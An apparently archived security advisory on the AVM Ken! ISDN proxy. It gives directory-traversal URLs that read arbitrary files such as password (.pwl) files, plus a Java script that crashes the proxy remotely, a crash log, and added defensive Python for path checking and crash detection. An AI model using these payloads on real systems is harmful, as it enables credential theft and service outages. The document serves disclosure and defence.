COMMAND

    Ken!

SYSTEMS AFFECTED

    Ken! ISDN Proxy Software.

PROBLEM

    "eAX [Teelicht]" found the following. He found two serious security
    bugs in the AVM Ken! internet/ISDN proxy software. While testing
    some things on a friend's system, which is running Ken!, he noticed
    that you can crash Ken! remotely and force it to cut off all
    connections, using a simple Telnet connection. He also found a way
    to download ANY file from the Ken! server. When we say ANY file we
    mean ANY file!

    The Denial of Service attack (crash):
    =====================================
    eAX scanned the system for open ports and noticed that port 3128
    was opened by Ken!. He connected to it via a telnet client and sent
    some junk data (at that point only interested in the HTTP error
    message), but then he noticed that Ken! crashes with a page fault,
    closes all connections and restarts. This was retested with a
    Windows 98 and a Windows 2000 machine; both Ken! installations
    crashed. (Tested with Ken! 1.03.10 (german).)

    The download everything bug (dangerous!!):
    ==========================================
    While looking for more bugs, eAX found the following. Type in your
    web browser:

        http://targethost:3128/../../../../../autoexec.bat

    or

        http://localhost:3128/../../../../../windows/any_pwl_you_want.pwl

    If Ken! is installed in C:/Programme/Ken!/ or C:/Program
    Files/Ken!, this will cause Ken! to send you the autoexec.bat, or
    any file you want (just change the URL): the ".." segments are
    resolved relative to Ken!'s install directory, so enough of them
    reach the root of the drive.
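    The check a proxy serving files must make before touching the file
    system, shown as an added example (not AVM's code and not part of the
    original advisory): naive_join() reproduces the unchecked pattern the
    advisory describes, safe_join() refuses anything that would leave the
    document root. DOC_ROOT is a constructed POSIX-style path so the
    example runs anywhere; the Windows-specific points (backslash as a
    separator, percent-encoded dots) are handled because a check that
    only looks at a literal "/../" would miss them.

```python
import posixpath
from urllib.parse import unquote

# Constructed document root for this example. On the page Ken! lives under
# C:\Program Files\Ken!; a POSIX-style path is used here so it runs anywhere.
DOC_ROOT = "/srv/proxy/www"


def naive_join(root, url_path):
    """The pattern the advisory describes: the request path is glued onto the
    install directory and handed to the file system unchecked, so every '..'
    segment is honoured and the result can lie outside root."""
    return posixpath.normpath(root + "/" + url_path.lstrip("/"))


def safe_join(root, url_path):
    """Resolve url_path under root. Returns the absolute path, or None when the
    request must be refused: a '..' segment (after percent-decoding, so
    %2e%2e is caught too), a NUL byte, or a backslash, which Windows treats
    as a separator and which a check that only looks at '/' would miss."""
    decoded = unquote(url_path)
    if "\x00" in decoded or "\\" in decoded:
        return None
    # Refuse any '..' segment outright instead of trusting normalisation to
    # clamp it; that also turns the attempt into a loggable event.
    if any(seg == ".." for seg in decoded.split("/")):
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    root_norm = posixpath.normpath(root)
    # Belt and braces: whatever normalisation did, the result stays in root.
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # secret.pwl and boot.ini are constructed file names for the demo
    for path in ("/index.html", "/../../../../../autoexec.bat",
                 "/%2e%2e/%2e%2e/windows/secret.pwl", "/docs\\..\\..\\boot.ini"):
        print("%-40s naive=%-25s safe=%s" % (path, naive_join(DOC_ROOT, path),
                                             safe_join(DOC_ROOT, path)))
```

    Note that naive_join() of the advisory's URL normalises to
    /autoexec.bat, i.e. the drive root, exactly the behaviour reported
    above, while safe_join() returns None for the same request and for its
    percent-encoded and backslash variants.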

    Below is exploit code written in Java, so that it can be used on
    any OS.

    import java.net.Socket;
    import java.io.*;

    /*
    BARBIE - The AVM KEN! exploit

    This exploit causes a crash in the AVM KEN! ISDN Proxy software.
    All connections will be cut off, but the server will restart again
    a few seconds later.

    Tested with AVM KEN! Version 1.03.10 (german)
    */

    class barbie {

        String address;

        // Connect to the Ken! proxy port and send a single line of junk;
        // the report above says this alone is enough to crash KENPROXY.EXE.
        public void killken() {
            PrintWriter out = null;
            try {
                Socket connection = new Socket(address, 3128);
                System.out.println("");
                System.out.println("killing...");
                out = new PrintWriter(connection.getOutputStream(), true);
                out.println("Whooopppss_Ken_died");
                connection.close();
            }
            catch (IOException e) {
                System.out.println("");
                System.out.println(" Can't meet Ken! ");
            }
        }

        public static void main(String arguments[]) {
            barbie kk = new barbie();
            if (arguments.length < 1) {
                System.out.println("");
                System.out.println("usage: java barbie <address/ip>");
                System.exit(1);
            }
            kk.address = arguments[0];
            kk.killken();
        }

    }

    Log file:

        2000-04-12 20:36:40 keninet: CheckLimits charge(0,50000) time(0,180000) -->0 ACTIVE=TRUE): t1=0 t2=955564600
        2000-04-12 20:40:14 kenserv: Process #6c is DOWN, Code=-1073741819
        2000-04-12 20:40:14 kenserv: Process KENPROXY.EXE TERMINATED witout UNREGISTER_MSG (CRASH), Restarting immed
        2000-04-12 20:40:14 kenserv: ----- Task PROXY(4) STOPPED, restart:1 immed.-----
        2000-04-12 20:40:14 kenserv: DUMP: bShutdown=0
        2000-04-12 20:40:14 kenserv:  TASK CAPI state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
        2000-04-12 20:40:14 kenserv:  TASK INET state=2 hProc=0x78 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
        2000-04-12 20:40:14 kenserv:  TASK PROXY state=0 hProc=0x0 tRest=1 bDelayedSt=0 nStopRetry=0 bStopFailed=0
        2000-04-12 20:40:14 kenserv:  TASK MAIL state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
        2000-04-12 20:40:14 kenserv:  TASK DHCP state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
        2000-04-12 20:40:14 kenserv:  TASK DNS state=0 hProc=0x0 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
        2000-04-12 20:40:14 kenserv:  TASK SOCKS state=2 hProc=0x5c tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
        2000-04-12 20:40:14 kenserv:  TASK MAP state=2 hProc=0x74 tRest=0 bDelayedSt=0 nStopRetry=0 bStopFailed=0
        2000-04-12 20:40:14 kenserv: Executing (KENPROXY.EXE) - OK
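    For a defender, the useful part of that log is the restart record:
    kenserv writes the exit code of the dead process as a signed decimal,
    and -1073741819 is 0xC0000005, STATUS_ACCESS_VIOLATION, the page fault
    the report mentions. The following is an added example, not an AVM
    tool, that parses lines in the format shown above (the regular
    expressions are assumptions based on that excerpt, which is used as
    the sample input), reports each crash with its NTSTATUS, and flags a
    process that crashes repeatedly within a short window, which is what
    the remote crash would look like on a monitored Ken! server.

```python
import re
from datetime import datetime

# Log excerpt as printed in the advisory above (kenserv.log lines), used here
# as sample input; the keninet line shows that unrelated lines are skipped.
SAMPLE_LOG = """\
2000-04-12 20:36:40 keninet: CheckLimits charge(0,50000) time(0,180000) -->0 ACTIVE=TRUE): t1=0 t2=955564600
2000-04-12 20:40:14 kenserv: Process #6c is DOWN, Code=-1073741819
2000-04-12 20:40:14 kenserv: Process KENPROXY.EXE TERMINATED witout UNREGISTER_MSG (CRASH), Restarting immed
2000-04-12 20:40:14 kenserv: ----- Task PROXY(4) STOPPED, restart:1 immed.-----
2000-04-12 20:40:14 kenserv: Executing (KENPROXY.EXE) - OK
"""

# Patterns are assumptions derived from the excerpt, not a documented format.
LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<src>\w+): (?P<msg>.*)$")
DOWN_RE = re.compile(r"Process #(?P<pid>[0-9a-fA-F]+) is DOWN, Code=(?P<code>-?\d+)")
CRASH_RE = re.compile(r"Process (?P<exe>\S+) TERMINATED .*\(CRASH\)")
TS_FMT = "%Y-%m-%d %H:%M:%S"


def ntstatus_hex(code):
    """kenserv prints the exit code as a signed 32-bit decimal. Reinterpret it
    as the unsigned NTSTATUS: -1073741819 -> 0xC0000005, the access violation
    behind the 'page fault' the advisory mentions."""
    return "0x%08X" % (int(code) & 0xFFFFFFFF)


def crash_events(log_text):
    """Return one record per '(CRASH)' line, paired with the exit code from the
    preceding 'is DOWN' line when there is one."""
    events, pending = [], None
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        msg = m.group("msg")
        down = DOWN_RE.search(msg)
        if down:
            pending = ntstatus_hex(down.group("code"))
            continue
        crash = CRASH_RE.search(msg)
        if crash:
            events.append({
                "time": datetime.strptime(m.group("ts"), TS_FMT),
                "exe": crash.group("exe"),
                "status": pending,
            })
            pending = None
    return events


def repeated_crashes(events, window_seconds=600, threshold=2):
    """Names of executables that crashed `threshold` or more times within any
    `window_seconds` span: a single restart is routine, a burst on the proxy
    is what the remote crash described above looks like in this log."""
    by_exe = {}
    for ev in events:
        by_exe.setdefault(ev["exe"], []).append(ev["time"])
    flagged = []
    for exe, times in by_exe.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_seconds:
                flagged.append(exe)
                break
    return flagged


if __name__ == "__main__":
    for ev in crash_events(SAMPLE_LOG):
        print(ev["time"], ev["exe"], ev["status"])
    print("bursting:", repeated_crashes(crash_events(SAMPLE_LOG)))
```

    On the excerpt alone this yields a single KENPROXY.EXE crash with
    status 0xC0000005 and no burst; feeding it two such restarts a few
    minutes apart flags the proxy, which is the condition worth alerting on.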

    This hole still exists in the 1.04.30 version.

SOLUTION

    The described security hole is only exploitable in local networks.
    The Ken! server secures itself against attacks from the internet
    with a NAT shield. Ken! wasn't designed for enterprises but for
    small networks, where the Ken! designers can expect the people to
    trust each other. The described errors were fixed in the latest
    version of Ken!, 1.04.32, which is now officially free for download
    at the ADC.